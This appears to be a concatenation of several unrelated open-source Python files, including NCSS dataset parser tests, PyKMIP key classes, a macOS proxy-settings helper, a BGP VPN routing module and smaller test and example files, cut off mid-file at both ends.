        return bytes(byte_values)
    def byte_to_int(byte_value):
        """Turn an element of a bytes object into an int."""
        return byte_value
    def bytes_to_ints(bytes_value):
        """Turn a bytes object into a sequence of ints."""
        return bytes_value
else:
    def to_bytes(s):
        """Convert string `s` to bytes (no-op in 2.x)."""
        return s
    def to_string(b):
        """Convert bytes `b` to a string (no-op in 2.x)."""
        return b
    def binary_bytes(byte_values):
        """Produce a byte string with the ints from `byte_values`."""
        return "".join([chr(b) for b in byte_values])
    def byte_to_int(byte_value):
        """Turn an element of a bytes object into an int."""
        return ord(byte_value)
    def bytes_to_ints(bytes_value):
        """Turn a bytes object into a sequence of ints."""
        for byte in bytes_value:
            yield ord(byte)
# hashlib appeared in 2.5; older Pythons have a standalone md5 module.
try:
    import hashlib
    md5 = hashlib.md5
except ImportError:
    import md5
    md5 = md5.new
|
data/Wtower/django-ninecms/ninecms/migrations/0004_auto_20150624_1131.py
|
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Replace the custom permissions declared on the ``node`` model."""

    dependencies = [
        ('ninecms', '0003_auto_20150623_1731'),
    ]
    operations = [
        migrations.AlterModelOptions(
            name='node',
            options={'permissions': (('access_toolbar', 'Can access the CMS toolbar'), ('use_full_html', 'Can use Full HTML in node body and summary'), ('list_nodes', 'Can list nodes'))},
        ),
    ]
|
data/Unidata/siphon/siphon/tests/test_ncss_dataset.py
|
import logging
import xml.etree.ElementTree as ET
from siphon.ncss_dataset import NCSSDataset, _Types
from siphon.testing import get_recorder
from siphon.http_util import urlopen
log = logging.getLogger("siphon.ncss_dataset")
log.setLevel(logging.WARNING)
log.addHandler(logging.StreamHandler())
recorder = get_recorder(__file__)
class TestSimpleTypes(object):
    'Test parsing simple types from NCSS dataset.xml'
    @classmethod
    def setup_class(cls):
        # One shared parser instance for all tests in the class.
        cls.types = _Types()

    def test_attribute_1(self):
        'Test parsing a string attribute'
        xml = '<attribute name="long_name" ' \
              'value="Specified height level above ground"/>'
        element = ET.fromstring(xml)
        expected = {"long_name": "Specified height level above ground"}
        actual = self.types.handle_attribute(element)
        assert expected == actual

    def test_attribute_2(self):
        'Test parsing a float nan attribute'
        import math
        xml = '<attribute name="missing_value" type="float" value="NaN"/>'
        element = ET.fromstring(xml)
        expected = {"missing_value": [float("NaN")]}
        actual = self.types.handle_attribute(element)
        # NaN != NaN, so compare keys and check NaN-ness explicitly.
        assert expected.keys() == actual.keys()
        assert(math.isnan(actual["missing_value"][0]))
        assert(math.isnan(expected["missing_value"][0]))

    def test_attribute_3(self):
        'Test parsing a float value attribute'
        xml = '<attribute name="missing_value" type="float" value="-999"/>'
        element = ET.fromstring(xml)
        expected = {"missing_value": [float(-999)]}
        actual = self.types.handle_attribute(element)
        assert expected == actual

    def test_attribute_4(self):
        'Test parsing an int attribute'
        xml = '<attribute name="missing_value" type="int" value="-999"/>'
        element = ET.fromstring(xml)
        expected = {"missing_value": [-999]}
        actual = self.types.handle_attribute(element)
        assert expected == actual

    def test_value_1(self):
        'Test parsing a float value tag'
        xml = '<values>2.0</values>'
        element = ET.fromstring(xml)
        expected = {"values": ["2.0"]}
        actual = self.types.handle_values(element)
        assert expected == actual

    def test_value_2(self):
        'Test parsing multiple floats in a value tag'
        xml = '<values>50000.0 70000.0 85000.0</values>'
        element = ET.fromstring(xml)
        expected = {"values": ["50000.0", "70000.0", "85000.0"]}
        actual = self.types.handle_values(element)
        assert expected == actual

    def test_value_3(self):
        'Test parsing multiple floats in a value tag to actual float values'
        xml = '<values>50000.0 70000.0 85000.0</values>'
        element = ET.fromstring(xml)
        expected = {"values": [50000.0, 70000.0, 85000.0]}
        actual = self.types.handle_values(element, value_type="float")
        assert expected == actual

    def test_value_4(self):
        'Test parsing multiple ints in a value tag to actual int values'
        xml = '<values>50000 70000 85000</values>'
        element = ET.fromstring(xml)
        expected = {"values": [50000, 70000, 85000]}
        actual = self.types.handle_values(element, value_type="int")
        assert expected == actual

    def test_projection_box(self):
        'Test parsing a projection box'
        xml = '<projectionBox>' \
              '<minx>-2959.1533203125</minx>' \
              '<maxx>2932.8466796875</maxx>' \
              '<miny>-1827.929443359375</miny>' \
              '<maxy>1808.070556640625</maxy>' \
              '</projectionBox>'
        element = ET.fromstring(xml)
        expected = {"projectionBox": {"minx": -2959.1533203125,
                                      "maxx": 2932.8466796875,
                                      "miny": -1827.929443359375,
                                      "maxy": 1808.070556640625}}
        actual = self.types.handle_projectionBox(element)
        assert expected == actual

    def test_axis_ref(self):
        'Test parsing an axis reference'
        xml = '<axisRef name="time1"/>'
        element = ET.fromstring(xml)
        expected = "time1"
        actual = self.types.handle_axisRef(element)
        assert expected == actual

    def test_coord_trans_ref(self):
        'Test parsing a coordinate transformation reference'
        xml = '<coordTransRef name="LambertConformal_Projection"/>'
        element = ET.fromstring(xml)
        expected = {"coordTransRef": "LambertConformal_Projection"}
        actual = self.types.handle_coordTransRef(element)
        assert expected == actual

    def test_grid(self):
        'Test parsing a grid tag'
        xml = '<grid name="Temperature_isobaric" ' \
              'desc="Temperature @ Isobaric surface" ' \
              'shape="time1 isobaric3 y x" type="float">' \
              '<attribute name="units" value="K"/>' \
              '<attribute name="missing_value" type="float" value="-999.9"/>' \
              '<attribute name="Grib2_Parameter" type="int" value="0 0 0"/>' \
              '</grid>'
        element = ET.fromstring(xml)
        expected = {"name": "Temperature_isobaric",
                    "desc": "Temperature @ Isobaric surface",
                    "shape": "time1 isobaric3 y x",
                    "attributes": {"units": "K",
                                   "missing_value": [-999.9],
                                   "Grib2_Parameter": [0, 0, 0]}}
        actual = self.types.handle_grid(element)
        assert expected["attributes"] == actual["attributes"]
        # BUG FIX: the old second assert compared the two popped
        # "attributes" values a second time, so name/desc/shape were
        # never verified.  Check them explicitly instead.
        for key in ("name", "desc", "shape"):
            assert expected[key] == actual[key]

    def test_parameter(self):
        'Test parsing a parameter tag'
        xml = '<parameter name="earth_radius" value="6371229.0 "/>'
        element = ET.fromstring(xml)
        expected = {"earth_radius": "6371229.0"}
        actual = self.types.handle_parameter(element)
        assert expected == actual

    def test_feature_type(self):
        'Test parsing a feature dataset tag'
        xml = '<featureDataset type="station" ' \
              'url="/thredds/ncss/nws/metar/ncdecoded/' \
              'Metar_Station_Data_fc.cdmr"/>'
        element = ET.fromstring(xml)
        expected = {"type": "station",
                    "url": "/thredds/ncss/nws/metar/ncdecoded/"
                           "Metar_Station_Data_fc.cdmr"}
        actual = self.types.handle_featureDataset(element)
        assert expected == actual

    def test_variable(self):
        'Test parsing variable tags'
        xml = '<variable name="precipitation_amount_hourly" type="float">' \
              '<attribute name="long_name" ' \
              'value="Hourly precipitation amount"/>' \
              '<attribute name="standard_name" ' \
              'value="precipitation_amount"/>' \
              '<attribute name="_FillValue" type="float" value="-99999.0"/>' \
              '<attribute name="units" value=".01 inches"/>' \
              '</variable>'
        element = ET.fromstring(xml)
        expected = {"name": "precipitation_amount_hourly",
                    "type": "float",
                    "attributes": {"long_name": "Hourly precipitation amount",
                                   "standard_name": "precipitation_amount",
                                   "_FillValue": [-99999.0],
                                   "units": ".01 inches"}}
        actual = self.types.handle_variable(element)
        assert expected == actual
def test_dataset_elements_axis():
    'Test parsing an axis from a dataset element'
    xml = '<axis name="height_above_ground" shape="1" type="float" ' \
          'axisType="Height"><attribute name="units" value="m"/>' \
          '<attribute name="long_name" ' \
          'value="Specified height level above ground"/>' \
          '<attribute name="positive" value="up"/><attribute ' \
          'name="Grib_level_type" type="int" value="103"/>' \
          '<attribute name="datum" value="ground"/>' \
          '<attribute name="_CoordinateAxisType" value="Height"/>' \
          '<attribute name="_CoordinateZisPositive" value="up"/>' \
          '<values>2.0</values></axis>'
    element = ET.fromstring(xml)
    actual = NCSSDataset(element).axes
    assert actual
    assert len(actual) == 1
    assert actual["height_above_ground"]
    # 4 entries: shape, type, attributes, values (8 attributes inside).
    assert len(actual["height_above_ground"]) == 4
    assert actual["height_above_ground"]["attributes"]
    assert len(actual["height_above_ground"]["attributes"]) == 8
def test_dataset_elements_grid_set():
    'Test parsing a gridSet from a dataset element'
    # Two grids share the same shape/axes, so both land in one gridSet.
    xml = '<gridSet name="time1 isobaric3 y x"><projectionBox>' \
          '<minx>-2959.1533203125</minx>' \
          '<maxx>2932.8466796875</maxx>' \
          '<miny>-1827.929443359375</miny>' \
          '<maxy>1808.070556640625</maxy>' \
          '</projectionBox>' \
          '<axisRef name="time1"/>' \
          '<axisRef name="isobaric3"/>' \
          '<axisRef name="y"/>' \
          '<axisRef name="x"/>' \
          '<coordTransRef name="LambertConformal_Projection"/>' \
          '<grid name="Relative_humidity_isobaric" ' \
          'desc="Relative humidity @ Isobaric surface" ' \
          'shape="time1 isobaric3 y x" type="float">' \
          '<attribute name="long_name" ' \
          'value="Relative humidity @ Isobaric surface"/>' \
          '<attribute name="units" value="%"/>' \
          '<attribute name="abbreviation" value="RH"/>' \
          '<attribute name="missing_value" type="float" value="NaN"/>' \
          '<attribute name="grid_mapping" ' \
          'value="LambertConformal_Projection"/>' \
          '<attribute name="coordinates" ' \
          'value="reftime time1 isobaric3 y x "/>' \
          '<attribute name="Grib_Variable_Id" value="VAR_0-1-1_L100"/>' \
          '<attribute name="Grib2_Parameter" type="int" value="0 1 1"/>' \
          '<attribute name="Grib2_Parameter_Discipline" ' \
          'value="Meteorological products"/>' \
          '<attribute name="Grib2_Parameter_Category" value="Moisture"/>' \
          '<attribute name="Grib2_Parameter_Name" ' \
          'value="Relative humidity"/>' \
          '<attribute name="Grib2_Level_Type" value="Isobaric surface"/>' \
          '<attribute name="Grib2_Generating_Process_Type" ' \
          'value="Forecast"/>' \
          '</grid>' \
          '<grid name="Temperature_isobaric" ' \
          'desc="Temperature @ Isobaric surface" ' \
          'shape="time1 isobaric3 y x" type="float">' \
          '<attribute name="long_name" ' \
          'value="Temperature @ Isobaric surface"/>' \
          '<attribute name="units" value="K"/>' \
          '<attribute name="abbreviation" value="TMP"/>' \
          '<attribute name="missing_value" type="float" value="NaN"/>' \
          '<attribute name="grid_mapping" ' \
          'value="LambertConformal_Projection"/>' \
          '<attribute name="coordinates" ' \
          'value="reftime time1 isobaric3 y x "/>' \
          '<attribute name="Grib_Variable_Id" value="VAR_0-0-0_L100"/>' \
          '<attribute name="Grib2_Parameter" type="int" value="0 0 0"/>' \
          '<attribute name="Grib2_Parameter_Discipline" ' \
          'value="Meteorological products"/>' \
          '<attribute name="Grib2_Parameter_Category" ' \
          'value="Temperature"/>' \
          '<attribute name="Grib2_Parameter_Name" value="Temperature"/>' \
          '<attribute name="Grib2_Level_Type" value="Isobaric surface"/>' \
          '<attribute name="Grib2_Generating_Process_Type" ' \
          'value="Forecast"/>' \
          '</grid>' \
          '</gridSet>'
    element = ET.fromstring(xml)
    actual = NCSSDataset(element).gridsets
    assert actual
    assert len(actual) == 1
    assert actual["time1 isobaric3 y x"]
    gs = actual["time1 isobaric3 y x"]
    assert gs["axisRef"]
    assert len(gs["axisRef"]) == 4
    assert gs["coordTransRef"]
    assert gs["projectionBox"]
    assert len(gs["projectionBox"]) == 4
    assert gs["grid"]
    assert len(gs["grid"]) == 2
    # Each grid: desc, shape, type and its 13 attributes.
    for grid in gs["grid"]:
        assert len(gs["grid"][grid]) == 4
        assert gs["grid"][grid]["desc"]
        assert gs["grid"][grid]["shape"]
        assert gs["grid"][grid]["type"]
        assert gs["grid"][grid]["type"] == "float"
        assert len(gs["grid"][grid]["attributes"]) == 13
def test_dataset_elements_coord_transform_valid():
    'Test parsing a coordinate transformation from a dataset element'
    xml = '<coordTransform name="LambertConformal_Projection" ' \
          'transformType="Projection">' \
          '<parameter name="grid_mapping_name" ' \
          'value="lambert_conformal_conic"/>' \
          '<parameter name="latitude_of_projection_origin" ' \
          'value="40.0 "/>' \
          '<parameter name="longitude_of_central_meridian" ' \
          'value="262.0 "/>' \
          '<parameter name="standard_parallel" value="40.0 "/>' \
          '<parameter name="earth_radius" value="6371229.0 "/>' \
          '</coordTransform>'
    element = ET.fromstring(xml)
    actual = NCSSDataset(element).coordinate_transforms
    assert actual
    assert actual["LambertConformal_Projection"]
    assert len(actual["LambertConformal_Projection"]) == 2
    assert actual["LambertConformal_Projection"]["transformType"] == "Projection"
    parameters = actual["LambertConformal_Projection"]["parameters"]
    assert len(parameters) == 5
    # NB: trailing whitespace in the parameter values must be stripped.
    expected = {"grid_mapping_name": "lambert_conformal_conic",
                "latitude_of_projection_origin": "40.0",
                "longitude_of_central_meridian": "262.0",
                "standard_parallel": "40.0",
                "earth_radius": "6371229.0"}
    assert parameters == expected
def test_dataset_elements_lat_lon_box():
    'Test parsing a lat/lon box from a dataset element'
    xml = ('<LatLonBox>'
           '<west>-140.1465</west>'
           '<east>-56.1753</east>'
           '<south>19.8791</south>'
           '<north>49.9041</north>'
           '</LatLonBox>')
    # The four bounds must come back as floats.
    box = NCSSDataset(ET.fromstring(xml)).lat_lon_box
    assert box
    assert box == {"west": -140.1465,
                   "east": -56.1753,
                   "south": 19.8791,
                   "north": 49.9041}
def test_dataset_elements_time_span():
    'Test parsing a TimeSpan'
    xml = ('<TimeSpan><begin>2015-06-19T12:00:00Z</begin>'
           '<end>2015-06-23T18:00:00Z</end></TimeSpan>')
    # begin/end should be preserved as ISO 8601 strings.
    span = NCSSDataset(ET.fromstring(xml)).time_span
    assert span
    assert span == {"begin": "2015-06-19T12:00:00Z",
                    "end": "2015-06-23T18:00:00Z"}
def test_dataset_elements_accept_list():
    'Test parsing an AcceptList'
    xml = '<AcceptList><GridAsPoint>' \
          '<accept displayName="xml">xml</accept>' \
          '<accept displayName="xml (file)">xml_file</accept>' \
          '<accept displayName="csv">csv</accept>' \
          '<accept displayName="csv (file)">csv_file</accept>' \
          '<accept displayName="netcdf">netcdf</accept>' \
          '<accept displayName="netcdf4">netcdf4</accept>' \
          '</GridAsPoint>' \
          '<Grid>' \
          '<accept displayName="netcdf">netcdf</accept>' \
          '<accept displayName="netcdf4">netcdf4</accept>' \
          '</Grid>' \
          '</AcceptList>'
    element = ET.fromstring(xml)
    # Accept formats are grouped under their enclosing tag name.
    expected = {"GridAsPoint": ["xml", "xml_file",
                                "csv", "csv_file",
                                "netcdf", "netcdf4"],
                "Grid": ["netcdf", "netcdf4"]}
    actual = NCSSDataset(element).accept_list
    assert expected == actual
def test_dataset_elements_station_accept_list():
    'Test parsing acceptList for stations'
    xml = '<AcceptList>' \
          '<accept displayName="csv">csv</accept>' \
          '<accept displayName="csv (file)">text/csv</accept>' \
          '<accept displayName="xml">xml</accept>' \
          '<accept displayName="xml (file)">text/xml</accept>' \
          '<accept displayName="WaterML 2.0">waterml2</accept>' \
          '<accept displayName="CF/NetCDF-3">netcdf</accept>' \
          '<accept displayName="CF/NetCDF-4">netcdf4</accept>' \
          '</AcceptList>'
    element = ET.fromstring(xml)
    # Ungrouped accepts fall under "PointFeatureCollection".
    expected = {"PointFeatureCollection": ["csv", "text/csv",
                                           "xml", "text/xml",
                                           "waterml2", "netcdf", "netcdf4"]}
    actual = NCSSDataset(element).accept_list
    assert expected == actual
@recorder.use_cassette('Surface_Synoptic_Station_Dataset_xml')
def test_dataset_elements_full_ncss_station():
    'Test parsing the dataset from a full ncss station page'
    # Smoke test: a recorded real-world station dataset.xml must parse.
    url = ('http://thredds.ucar.edu/thredds/ncss/nws/synoptic/'
           'ncdecoded/Surface_Synoptic_Point_Data_fc.cdmr/dataset.xml')
    element = ET.fromstring(urlopen(url).read())
    parsed = NCSSDataset(element)
    assert parsed
@recorder.use_cassette('GFS_Global_0p5_Grid_Dataset_xml')
def test_dataset_elements_full_ncss_grid():
    'Test parsing the dataset from a full ncss grid page'
    # Smoke test: a recorded real-world grid dataset.xml must parse.
    url = ('http://thredds.ucar.edu/thredds/ncss/grib/NCEP/GFS/'
           'Global_0p5deg/GFS_Global_0p5deg_20150602_0000.grib2/'
           'dataset.xml')
    element = ET.fromstring(urlopen(url).read())
    parsed = NCSSDataset(element)
    assert parsed
|
data/OpenKMIP/PyKMIP/kmip/core/keys.py
|
from kmip.core.enums import Tags
from kmip.core.primitives import Struct
from kmip.core.primitives import ByteString
from kmip.core.utils import BytearrayStream
class RawKey(ByteString):
    # Key Material carried as an opaque byte string (Raw key format).
    def __init__(self, value=None):
        super(RawKey, self).__init__(value, Tags.KEY_MATERIAL)
class OpaqueKey(ByteString):
    # Key Material carried as an opaque byte string (Opaque key format).
    def __init__(self, value=None):
        super(OpaqueKey, self).__init__(value, Tags.KEY_MATERIAL)
class PKCS1Key(ByteString):
    # Key Material holding PKCS#1-encoded key bytes.
    def __init__(self, value=None):
        super(PKCS1Key, self).__init__(value, Tags.KEY_MATERIAL)
class PKCS8Key(ByteString):
    # Key Material holding PKCS#8-encoded key bytes.
    def __init__(self, value=None):
        super(PKCS8Key, self).__init__(value, Tags.KEY_MATERIAL)
class X509Key(ByteString):
    # Key Material holding X.509-encoded key bytes.
    def __init__(self, value=None):
        super(X509Key, self).__init__(value, Tags.KEY_MATERIAL)
class ECPrivateKey(ByteString):
    # Key Material holding EC private key bytes.
    def __init__(self, value=None):
        super(ECPrivateKey, self).__init__(value, Tags.KEY_MATERIAL)
class TransparentSymmetricKey(Struct):
    """Key Material structure wrapping a single Key byte string."""

    class Key(ByteString):
        # The inner KEY-tagged byte string.
        def __init__(self, value=None):
            super(TransparentSymmetricKey.Key, self).__init__(value, Tags.KEY)

    def __init__(self, key=None):
        super(TransparentSymmetricKey, self).__init__(Tags.KEY_MATERIAL)
        self.key = key
        self.validate()

    def read(self, istream):
        """Decode the structure header, then the inner Key, from *istream*."""
        super(TransparentSymmetricKey, self).read(istream)
        tstream = BytearrayStream(istream.read(self.length))
        self.key = TransparentSymmetricKey.Key()
        self.key.read(tstream)
        # Anything left in tstream means the advertised length was wrong.
        self.is_oversized(tstream)
        self.validate()

    def write(self, ostream):
        """Encode the Key into a scratch stream first to compute the length."""
        tstream = BytearrayStream()
        self.key.write(tstream)
        self.length = tstream.length()
        super(TransparentSymmetricKey, self).write(ostream)
        ostream.write(tstream.buffer)

    def validate(self):
        self.__validate()

    def __validate(self):
        # TODO: no validation rules implemented yet.
        pass
|
data/OpenMDAO/OpenMDAO-Framework/openmdao.main/src/openmdao/main/test/test_set_defaults.py
|
"""
Test for setting input variables back to their default values.
"""
import unittest
from openmdao.main.api import Component, Assembly
from openmdao.main.datatypes.api import Float, List, Array
from numpy import array, zeros
class MyDefComp(Component):
    """Component whose inputs all declare explicit default values."""
    f_in = Float(3.14, iotype='in')
    f_out = Float(iotype='out')
    arr_in = Array([1.,2.,3.], iotype='in')
    list_in = List(value=['a','b','c'], iotype='in')
    def execute(self):
        self.f_out = self.f_in + 1.
class MyNoDefComp(Component):
    """Component whose inputs rely on implicit (type) defaults."""
    f_in = Float(iotype='in')
    f_out = Float(iotype='out')
    arr_in = Array(iotype='in')
    list_in = List(iotype='in')
    def execute(self):
        self.f_out = self.f_in + 1.
class SetDefaultsTestCase(unittest.TestCase):
    """Checks that revert_to_defaults() restores declared default values."""

    def test_set_to_unset_default(self):
        """Inputs without explicit defaults revert to type defaults."""
        comp = MyNoDefComp()
        self.assertEqual(0., comp.f_in)
        comp.f_in = 42.
        comp.arr_in = array([88., 32.])
        comp.list_in = [1, 2, 3]
        comp.run()
        comp.revert_to_defaults()
        self.assertEqual(0., comp.f_in)
        self.assertTrue(all(zeros(0, 'd') == comp.arr_in))
        self.assertEqual([], comp.list_in)

    def test_set_to_default(self):
        """Inputs with explicit defaults revert to those defaults."""
        comp = MyDefComp()
        self.assertEqual(3.14, comp.f_in)
        comp.f_in = 42.
        comp.arr_in = array([88., 32.])
        # BUG FIX: the old check did assertFalse(array == array), which
        # relies on elementwise comparison of differently-shaped arrays
        # collapsing to a scalar False -- deprecated in numpy.  Compare
        # as plain lists instead.
        self.assertNotEqual([1., 2., 3.], list(comp.arr_in))
        comp.run()
        comp.revert_to_defaults()
        self.assertEqual(3.14, comp.f_in)
        self.assertTrue(all(array([1., 2., 3.]) == comp.arr_in))

    def test_set_recursive(self):
        """revert_to_defaults() recurses into an Assembly's children."""
        asm = Assembly()
        asm.add('defcomp', MyDefComp())
        asm.add('nodefcomp', MyNoDefComp())
        self.assertEqual(0., asm.nodefcomp.f_in)
        self.assertEqual(3.14, asm.defcomp.f_in)
        asm.nodefcomp.f_in = 99
        asm.defcomp.f_in = 99
        asm.revert_to_defaults()
        self.assertEqual(0., asm.nodefcomp.f_in)
        self.assertEqual(3.14, asm.defcomp.f_in)

if __name__ == '__main__':
    unittest.main()
|
data/Yelp/pyleus/examples/apparent_temperature/apparent_temperature/humidity_generator.py
|
from __future__ import absolute_import
import logging
from collections import namedtuple
import random
from apparent_temperature.measure_generator import MeasureGeneratorSpout
log = logging.getLogger('humidity_generator')

# Record type for a single simulated humidity reading.
HumidityMeasure = namedtuple(
    "HumidityMeasure",
    "id_sensor timestamp humidity")
class HumiditySpout(MeasureGeneratorSpout):
    """Spout emitting randomly generated humidity measures."""

    OUTPUT_FIELDS = HumidityMeasure

    # Per-sensor generation parameters; presumably (mean, std-dev) fed to
    # random.normalvariate() in measure() -- confirm against the base class.
    SENSORS = {
        1042: (56, 17),
        1077: (47, 22),
        1078: (22, 19),
        1079: (12, 15),
        1082: (67, 15),
        1126: (70, 12),
        1156: (51, 19),
        1178: (43, 14),
        1201: (57, 11),
        1234: (55, 7),
        1312: (12, 9),
        1448: (56, 22),
        2089: (32, 30),
    }

    def measure(self, *args):
        # Gaussian sample, capped at 100% relative humidity.
        return min(100, random.normalvariate(*args))

    def log(self, measure):
        log.debug("id: {0}, time: {1}, humidity: {2}%"
                  .format(*measure))
# Run the spout standalone, appending debug output to a log file.
if __name__ == '__main__':
    logging.basicConfig(
        level=logging.DEBUG,
        filename='/tmp/apparent_temperature_humidity.log',
        filemode='a',
    )
    HumiditySpout().run()
|
data/MacSysadmin/pymacadmin/lib/PyMacAdmin/SCUtilities/SCPreferences.py
|
"""
SCPreferences.py: Simplified interaction with SystemConfiguration preferences
TODO:
* Refactor getvalue/setvalue code into generic functions for dealing with things other than proxies
* Add get_proxy() to parallel set_proxy()
"""
import sys
import os
import unittest
from SystemConfiguration import *
class SCPreferences(object):
    """Utility class for working with the SystemConfiguration framework"""
    proxy_protocols = ('HTTP', 'FTP', 'SOCKS')
    session = None

    def __init__(self):
        super(SCPreferences, self).__init__()
        # Open a SystemConfiguration preferences session named "set-proxy".
        self.session = SCPreferencesCreate(None, "set-proxy", None)

    def save(self):
        """Commit and apply any pending changes in this session."""
        if not self.session:
            return
        if not SCPreferencesCommitChanges(self.session):
            raise RuntimeError("Unable to save SystemConfiguration changes")
        if not SCPreferencesApplyChanges(self.session):
            raise RuntimeError("Unable to apply SystemConfiguration changes")

    def set_proxy(self, enable=True, protocol="HTTP", server="localhost", port=3128):
        """Enable or disable *protocol* proxying for every network service.

        NOTE(review): assumes every service dict under /NetworkServices/
        already has a 'Proxies' entry -- confirm before relying on this.
        """
        new_settings = SCPreferencesPathGetValue(self.session, u'/NetworkServices/')
        for interface in new_settings:
            new_settings[interface]['Proxies']["%sEnable" % protocol] = 1 if enable else 0
            if enable:
                new_settings[interface]['Proxies']['%sPort' % protocol] = int(port)
                new_settings[interface]['Proxies']['%sProxy' % protocol] = server
        SCPreferencesPathSetValue(self.session, u'/NetworkServices/', new_settings)
class SCPreferencesTests(unittest.TestCase):
    """Placeholder test case -- fails loudly until real tests are written."""
    def setUp(self):
        raise RuntimeError("Thwack Chris about not writing these yet")

if __name__ == '__main__':
    unittest.main()
|
data/Orange-OpenSource/bagpipe-bgp/bagpipe/bgp/vpn/ipvpn/__init__.py
|
import logging
import socket
from bagpipe.bgp.common import utils
from bagpipe.bgp.common import logDecorator
from bagpipe.bgp.vpn.vpn_instance import VPNInstance
from bagpipe.bgp.engine import RouteEvent
from bagpipe.bgp.vpn.dataplane_drivers import DummyDataplaneDriver \
as _DummyDataplaneDriver
from bagpipe.bgp.common.looking_glass import LookingGlass, LGMap
from bagpipe.exabgp.structure.vpn import RouteDistinguisher, VPNLabelledPrefix
from bagpipe.exabgp.structure.mpls import LabelStackEntry
from bagpipe.exabgp.structure.address import AFI, SAFI
from bagpipe.exabgp.structure.ip import Inet, Prefix
from bagpipe.exabgp.message.update.route import Route
from bagpipe.exabgp.message.update.attribute.nexthop import NextHop
from bagpipe.exabgp.message.update.attribute.communities import ECommunities
class DummyDataplaneDriver(_DummyDataplaneDriver):
    # IP VPN flavor of the no-op dataplane driver.
    pass
class VRF(VPNInstance, LookingGlass):
type = "ipvpn"
afi = AFI(AFI.ipv4)
safi = SAFI(SAFI.mpls_vpn)
    @logDecorator.log
    def __init__(self, *args, **kwargs):
        """Create the VRF, starting with an empty re-advertised prefix set."""
        VPNInstance.__init__(self, *args, **kwargs)
        self.readvertised = set()
    def _routeFrom(self, prefix, label, rd):
        # Wrap prefix/RD into a labelled VPN route with a single
        # (bottom-of-stack) label.
        return Route(VPNLabelledPrefix(self.afi, self.safi, prefix, rd,
                                       [LabelStackEntry(label, True)]
                                       ))
def generateVifBGPRoute(self, macAdress, ipPrefix, prefixLen, label):
route = self._routeFrom(Prefix(self.afi, ipPrefix, prefixLen), label,
RouteDistinguisher(
RouteDistinguisher.TYPE_IP_LOC, None,
self.bgpManager.getLocalAddress(),
self.instanceId)
)
self.log.debug("route attributes: %s", route.attributes)
return self._newRouteEntry(self.afi, self.safi, self.exportRTs,
route.nlri, route.attributes)
def _getLocalLabels(self):
for portData in self.macAddress2LocalPortData.itervalues():
yield portData['label']
def _getRDFromLabel(self, label):
return RouteDistinguisher(RouteDistinguisher.TYPE_IP_LOC, None,
self.bgpManager.getLocalAddress(),
10000+label)
def _routeForReAdvertisement(self, prefix, label):
route = self._routeFrom(prefix, label,
self._getRDFromLabel(label))
nh = Inet(1, socket.inet_pton(socket.AF_INET,
self.dataplane.driver.getLocalAddress()))
route.attributes.add(NextHop(nh))
route.attributes.add(ECommunities(self.readvertiseToRTs))
routeEntry = self._newRouteEntry(self.afi, self.safi,
self.readvertiseToRTs,
route.nlri, route.attributes)
return routeEntry
@logDecorator.log
def _readvertise(self, nlri):
self.log.debug("Start re-advertising %s from VRF", nlri.prefix)
for label in self._getLocalLabels():
self.log.debug("Start re-advertising %s from VRF, with label %s",
nlri.prefix, label)
routeEntry = self._routeForReAdvertisement(nlri.prefix, label)
self._pushEvent(RouteEvent(RouteEvent.ADVERTISE, routeEntry))
self.readvertised.add(nlri.prefix)
@logDecorator.log
def _readvertiseStop(self, nlri):
self.log.debug("Stop re-advertising %s from VRF", nlri.prefix)
for label in self._getLocalLabels():
self.log.debug("Stop re-advertising %s from VRF, with label %s",
nlri.prefix, label)
routeEntry = self._routeForReAdvertisement(nlri.prefix, label)
self._pushEvent(RouteEvent(RouteEvent.WITHDRAW, routeEntry))
self.readvertised.remove(nlri.prefix)
def vifPlugged(self, macAddress, ipAddressPrefix, localPort,
advertiseSubnet):
VPNInstance.vifPlugged(self, macAddress, ipAddressPrefix, localPort,
advertiseSubnet)
label = self.macAddress2LocalPortData[macAddress]['label']
for prefix in self.readvertised:
self.log.debug("Re-advertising %s with this port as next hop",
prefix)
routeEntry = self._routeForReAdvertisement(prefix, label)
self._pushEvent(RouteEvent(RouteEvent.ADVERTISE, routeEntry))
def vifUnplugged(self, macAddress, ipAddressPrefix, advertiseSubnet):
label = self.macAddress2LocalPortData[macAddress]['label']
for prefix in self.readvertised:
self.log.debug("Stop re-advertising %s with this port as next hop",
prefix)
routeEntry = self._routeForReAdvertisement(prefix, label)
self._pushEvent(RouteEvent(RouteEvent.WITHDRAW, routeEntry))
VPNInstance.vifUnplugged(self, macAddress, ipAddressPrefix,
advertiseSubnet)
def _route2trackedEntry(self, route):
if isinstance(route.nlri, VPNLabelledPrefix):
return route.nlri.prefix
else:
self.log.error("We should not receive routes of type %s",
type(route.nlri))
return None
def _toReadvertise(self, route):
return (len(set(route.routeTargets).intersection(
set(self.readvertiseFromRTs))) > 0)
def _imported(self, route):
return (len(set(route.routeTargets).intersection(
set(self.importRTs))) > 0)
@utils.synchronized
@logDecorator.log
def _newBestRoute(self, entry, newRoute):
prefix = entry
if self.readvertise:
self.log.debug("route RTs: %s", newRoute.routeTargets)
self.log.debug("readv from RTs: %s", self.readvertiseFromRTs)
if self._toReadvertise(newRoute):
self.log.debug("Need to re-advertise %s", prefix)
self._readvertise(newRoute.nlri)
if not self._imported(newRoute):
self.log.debug("No need to setup dataplane for:%s", prefix)
return
encaps = self._checkEncaps(newRoute)
if not encaps:
return
self.dataplane.setupDataplaneForRemoteEndpoint(
prefix, newRoute.attributes.get(NextHop.ID).next_hop,
newRoute.nlri.labelStack[0].labelValue, newRoute.nlri, encaps)
@utils.synchronized
@logDecorator.log
def _bestRouteRemoved(self, entry, oldRoute, last):
prefix = entry
if self.readvertise and last:
if self._toReadvertise(oldRoute):
self.log.debug("Need to stop re-advertising %s", prefix)
self._readvertiseStop(oldRoute.nlri)
if not self._imported(oldRoute):
self.log.debug("No need to setup dataplane for:%s", prefix)
return
if self._skipRouteRemoval(last):
self.log.debug("Skipping removal of non-last route because "
"dataplane does not want it")
return
self.dataplane.removeDataplaneForRemoteEndpoint(
prefix, oldRoute.attributes.get(NextHop.ID).next_hop,
oldRoute.nlri.labelStack[0].labelValue, oldRoute.nlri)
def getLGMap(self):
return {
"readvertised": (LGMap.VALUE, [repr(prefix) for prefix in
self.readvertised])
}
|
data/adblockplus/gyp/test/compiler-override/gyptest-compiler-env-toolchain.py
|
"""
Verifies that the user can override the compiler and linker using
CC/CXX/NM/READELF environment variables.
"""
import TestGyp
import os
import copy
import sys
here = os.path.dirname(os.path.abspath(__file__))

# This test relies on POSIX toolchain override variables; skip on Windows.
if sys.platform == 'win32':
